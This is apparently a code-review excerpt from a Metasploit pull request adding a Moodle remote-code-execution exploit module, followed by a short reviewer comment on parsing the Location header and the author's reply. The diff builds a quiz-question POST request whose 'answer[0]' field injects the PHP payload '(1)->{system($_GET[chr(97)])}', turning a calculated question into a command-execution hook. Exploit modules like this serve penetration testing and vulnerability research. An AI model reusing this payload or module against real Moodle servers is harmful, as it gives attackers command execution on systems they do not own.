modules/exploits/linux/http/moodle_rce.rb

```diff
@@ -0,0 +1,320 @@
+      'uri' => normalize_uri(target_uri.path, 'moodle/question/bank/editquestion/question.php'),
+      'headers' => {
+        'Cookie' => "MoodleSession=#{moodlesession}; MOODLEID1_=#{moodleid1}"
+      },
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'initialcategory' => '1',
+        'reload' => '1',
+        'shuffleanswers' => '1',
+        'answernumbering' => 'abc',
+        'mform_isexpanded_id_answerhdr' => '1',
+        'noanswers' => '1',
+        'nounits' => '1',
+        'numhints' => '2',
+        'synchronize' => nil,
+        'wizard' => 'datasetdefinitions',
+        'id' => nil,
+        'inpopup' => '0',
+        'cmid' => datastore['CMID'].to_s,
+        'courseid' => datastore['COURSEID'].to_s,
+        'returnurl' => "/mod/quiz/edit.php?cmid=#{datastore['CMID']}&addonpage=0",
+        'mdlscrollto' => '0',
+        'appendqnumstring' => 'addquestion',
+        'qtype' => 'calculated',
+        'makecopy' => '0',
+        'sesskey' => sesskey.to_s,
+        '_qf__qtype_calculated_edit_form' => '1',
+        'mform_isexpanded_id_generalheader' => '1',
+        'mform_isexpanded_id_unithandling' => '0',
+        'mform_isexpanded_id_unithdr' => '0',
+        'mform_isexpanded_id_multitriesheader' => '0',
+        'mform_isexpanded_id_tagsheader' => '0',
+        'category' => "#{category},#{course_context_id}",
+        'name' => 'XXXXXXXXXXXXXXXX',
+        'questiontext[text]' => '<p>{b}</p>',
+        'questiontext[format]' => '1',
+        'questiontext[itemid]' => '424815274',
+        'status' => 'ready',
+        'defaultmark' => '1',
+        'generalfeedback[text]' => nil,
+        'generalfeedback[format]' => '1',
+        'generalfeedback[itemid]' => '940093981',
+        'idnumber' => nil,
+        'answer[0]' => '(1)->{system($_GET[chr(97)])}',
+        'fraction[0]' => '1.0',
+        'tolerance[0]' => '0.01',
+        'tolerancetype[0]' => '1',
+        'correctanswerlength[0]' => '2',
+        'correctanswerformat[0]' => '1',
+        'feedback[0][text]' => nil,
+        'feedback[0][format]' => '1',
+        'feedback[0][itemid]' => '738798744',
+        'unitrole' => '3',
+        'penalty' => '0.3333333',
+        'hint[0][text]' => nil,
+        'hint[0][format]' => '1',
+        'hint[0][itemid]' => '562446571',
+        'hint[1][text]' => nil,
+        'hint[1][format]' => '1',
+        'hint[1][itemid]' => '161675382',
+        'tags' => '_qf__force_multiselect_submission',
+        'submitbutton' => 'Save+changes'
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    html = res.get_html_document
+
+    unless res.code == 303 && html.to_s.include?('question/bank/editquestion/question.php?qtype=calculated')
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from the target.')
+    end
+
+    raw_res = res.to_s
+    id = raw_res.match(/&id=(\d+)/)[1]
```

Comment:
Could you just search the location header like this: `res.headers['Location'].match(/&id=(\d+)/)[1]` instead of searching through the whole request?

Reply:
Yes - updated, thank you.